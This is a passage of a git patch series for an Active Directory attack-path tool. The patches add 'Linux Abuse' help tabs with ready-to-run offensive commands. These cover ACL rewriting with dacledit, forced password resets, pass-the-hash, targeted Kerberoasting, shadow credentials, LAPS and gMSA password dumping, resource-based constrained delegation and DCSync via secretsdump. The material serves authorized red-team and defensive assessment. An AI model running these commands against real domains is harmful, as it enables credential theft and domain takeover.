Subject: [PATCH 19/32] Forgot a few references

---
 src/components/Modals/HelpTexts/GetChanges/References.jsx    | 4 ++++
 src/components/Modals/HelpTexts/GetChangesAll/References.jsx | 4 ++++
 2 files changed, 8 insertions(+)

diff --git a/src/components/Modals/HelpTexts/GetChanges/References.jsx b/src/components/Modals/HelpTexts/GetChanges/References.jsx
index c9efb1890..ee2a95b3a 100644
--- a/src/components/Modals/HelpTexts/GetChanges/References.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/References.jsx
@@ -10,6 +10,10 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/'>
                 https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/GetChangesAll/References.jsx b/src/components/Modals/HelpTexts/GetChangesAll/References.jsx
index c9efb1890..ee2a95b3a 100644
--- a/src/components/Modals/HelpTexts/GetChangesAll/References.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/References.jsx
@@ -10,6 +10,10 @@ const References = () => {
             <a href='https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/'>
                 https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
         </>
     );
 };

From df384f389a6f2c3a3faa736eb6b7573c613d6351 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:13:20 +0100
Subject: [PATCH 20/32] Redundant case

---
 .../HelpTexts/GenericAll/LinuxAbuse.jsx       | 44 -------------------
 1 file changed, 44 deletions(-)

diff --git a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
index 49258b644..7b16993c5 100644
--- a/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/LinuxAbuse.jsx
@@ -378,50 +378,6 @@ const LinuxAbuse = ({
 
                     <h4>Targeted Descendent Object Takeoever</h4>
 
-                    <p>
-                        If you want to be more targeted with your approach, it
-                        is possible to specify precisely what right you want to
-                        apply to precisely which kinds of descendent objects.
-                        Refer to the Windows Abuse info for this.
-                    </p>
-                </>
-            );
-        case 'OU':
-            return (
-                <>
-                    <h4>Control of the Organization Unit</h4>
-
-                    <p>
-                        With full control of the OU, you may add a new ACE on
-                        the OU that will inherit down to the objects under that
-                        OU. Below are two options depending on how targeted you
-                        choose to be in this step:
-                    </p>
-
-                    <h4>Generic Descendent Object Takeover</h4>
-                    <p>
-                        The simplest and most straight forward way to abuse
-                        control of the OU is to apply a GenericAll ACE on the OU
-                        that will inherit down to all object types. This
-                        can be done using Impacket's dacledit (cf. "grant rights"
-                        reference for the link).
-                    </p>
-
-                    <pre>
-                        <code>
-                            {
-                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
-                            }
-                        </code>
-                    </pre>
-
-                    <p>
-                        Now, the "JKOHLER" user will have full control of all
-                        descendent objects of each type.
-                    </p>
-
-                    <h4>Targeted Descendent Object Takeoever</h4>
-
                     <p>
                         If you want to be more targeted with your approach, it
                         is possible to specify precisely what right you want to

From 208d42cd3f6e3cb0e12d7611ddb72b136d495150 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:13:31 +0100
Subject: [PATCH 21/32] Owns Linux abuse

---
 .../Modals/HelpTexts/Owns/LinuxAbuse.jsx      | 583 ++++++++++++++++++
 src/components/Modals/HelpTexts/Owns/Owns.jsx |  20 +-
 .../Modals/HelpTexts/Owns/References.jsx      |   8 +
 .../Owns/{Abuse.jsx => WindowsAbuse.jsx}      |   6 +-
 4 files changed, 609 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/Owns/{Abuse.jsx => WindowsAbuse.jsx} (99%)

diff --git a/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
new file mode 100644
index 000000000..31e275352
--- /dev/null
+++ b/src/components/Modals/HelpTexts/Owns/LinuxAbuse.jsx
@@ -0,0 +1,583 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <h4> Modifying the rights </h4>
+
+                    <p>
+                        To abuse ownership of a group object, you may grant
+                        yourself the AddMember privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Adding to the group </h4>
+
+                    <p>
+                        You can now add members to the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Cleanup </h4>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+
+        case 'User':
+            return (
+                <>
+                    <p>
+                        To abuse ownership of a user object, you may grant
+                        yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <p>
+                            To abuse ownership of a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        To abuse ownership of a domain object, you may grant
+                        yourself the DcSync privileges.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        If FullControl (GenericAll) is obtained on the domain,
+                        instead of granting DCSync rights, the AllExtendedRights
+                        privilege included grants {sourceName} enough{' '}
+                        privileges to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        To abuse ownership of a GPO, you may
+                        grant yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                    Impacket's dacledit can be used for that purpose (cf.
+                    "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With ownership of the OU object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With ownership of the container object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/Owns/Owns.jsx b/src/components/Modals/HelpTexts/Owns/Owns.jsx
index 4366f2081..6b56f905c 100644
--- a/src/components/Modals/HelpTexts/Owns/Owns.jsx
+++ b/src/components/Modals/HelpTexts/Owns/Owns.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -17,8 +18,8 @@ const Owns = ({ sourceName, sourceType, targetName, targetType, targetId }) => {
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -26,10 +27,19 @@ const Owns = ({ sourceName, sourceType, targetName, targetType, targetId }) => {
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/Owns/References.jsx b/src/components/Modals/HelpTexts/Owns/References.jsx
index 5893873dd..1da4bf6fa 100644
--- a/src/components/Modals/HelpTexts/Owns/References.jsx
+++ b/src/components/Modals/HelpTexts/Owns/References.jsx
@@ -38,6 +38,14 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
+                https://www.thehacker.recipes/ad/movement/dacl/grant-rights
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/Owns/Abuse.jsx b/src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx
similarity index 99%
rename from src/components/Modals/HelpTexts/Owns/Abuse.jsx
rename to src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx
index 84850dc5a..abfaf77d8 100644
--- a/src/components/Modals/HelpTexts/Owns/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/Owns/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -912,7 +912,7 @@ const Abuse = ({
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -921,4 +921,4 @@ Abuse.propTypes = {
     haslaps: PropTypes.bool,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 17f2773cf72620ecd971984fc9c9c1a300feff8b Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:39:56 +0100
Subject: [PATCH 22/32] Missing Owns refs

---
 .../Modals/HelpTexts/Owns/References.jsx      | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)

diff --git a/src/components/Modals/HelpTexts/Owns/References.jsx b/src/components/Modals/HelpTexts/Owns/References.jsx
index 1da4bf6fa..958bb50ca 100644
--- a/src/components/Modals/HelpTexts/Owns/References.jsx
+++ b/src/components/Modals/HelpTexts/Owns/References.jsx
@@ -43,6 +43,30 @@ const References = () => {
                 https://www.thehacker.recipes/ad/movement/dacl/addmember
             </a>
             <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting'>
+                https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/group-policies'>
+                https://www.thehacker.recipes/ad/movement/group-policies
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials'>
+                https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
             <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
                 https://www.thehacker.recipes/ad/movement/dacl/grant-rights
             </a>

From d3d67a8f2e97e844cc83788fcb61e0000b31a1ab Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:40:16 +0100
Subject: [PATCH 23/32] ReadGMSAPassword Linux abuse

---
 .../HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx | 47 +++++++++++++++++++
 .../ReadGMSAPassword/ReadGMSAPassword.jsx     | 14 ++++--
 .../HelpTexts/ReadGMSAPassword/References.jsx |  4 ++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  4 +-
 4 files changed, 62 insertions(+), 7 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/ReadGMSAPassword/{Abuse.jsx => WindowsAbuse.jsx} (97%)

diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx
new file mode 100644
index 000000000..227c5ee86
--- /dev/null
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/LinuxAbuse.jsx
@@ -0,0 +1,47 @@
+import React from "react";
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                There are several ways to abuse the ability to read the GMSA
+                password. The most straight forward abuse is possible when the
+                GMSA is currently logged on to a computer, which is the intended
+                behavior for a GMSA. If the GMSA is logged on to the computer
+                account which is granted the ability to retrieve the GMSA's
+                password, simply steal the token from the process running as the
+                GMSA, or inject into that process.
+            </p>
+            <p>
+                If the GMSA is not logged onto the computer, you may create a
+                scheduled task or service set to run as the GMSA. The computer
+                account will start the sheduled task or service as the GMSA, and
+                then you may abuse the GMSA logon in the same fashion you would
+                a standard user running processes on the machine (see the
+                "HasSession" help modal for more details).
+            </p>
+            <p>
+                Finally, it is possible to remotely retrieve the password for
+                the GMSA and convert that password to its equivalent NT hash.
+                <a href="https://github.com/micahvandeusen/gMSADumper">gMSADumper.py</a> can be used for that purpose.
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "gMSADumper.py -u 'user' -p 'password' -d 'domain.local'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                At this point you are ready to use the NT hash the same way you
+                would with a regular user account. You can perform
+                pass-the-hash, overpass-the-hash, or any other technique that
+                takes an NT hash as an input.
+            </p>
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx
index fa86f46e1..7bd2f8d39 100644
--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/ReadGMSAPassword.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -21,13 +22,16 @@ const ReadGMSAPassword = ({
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx
index 82ba827d5..b57a2d372 100644
--- a/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx
+++ b/src/components/Modals/HelpTexts/ReadGMSAPassword/References.jsx
@@ -26,6 +26,10 @@ const References = () => {
             <a href='https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4662'>
                 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4662
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/ReadGMSAPassword/Abuse.jsx b/src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx
similarity index 97%
rename from src/components/Modals/HelpTexts/ReadGMSAPassword/Abuse.jsx
rename to src/components/Modals/HelpTexts/ReadGMSAPassword/WindowsAbuse.jsx
index 80dce418d..0cb000bdd 100644
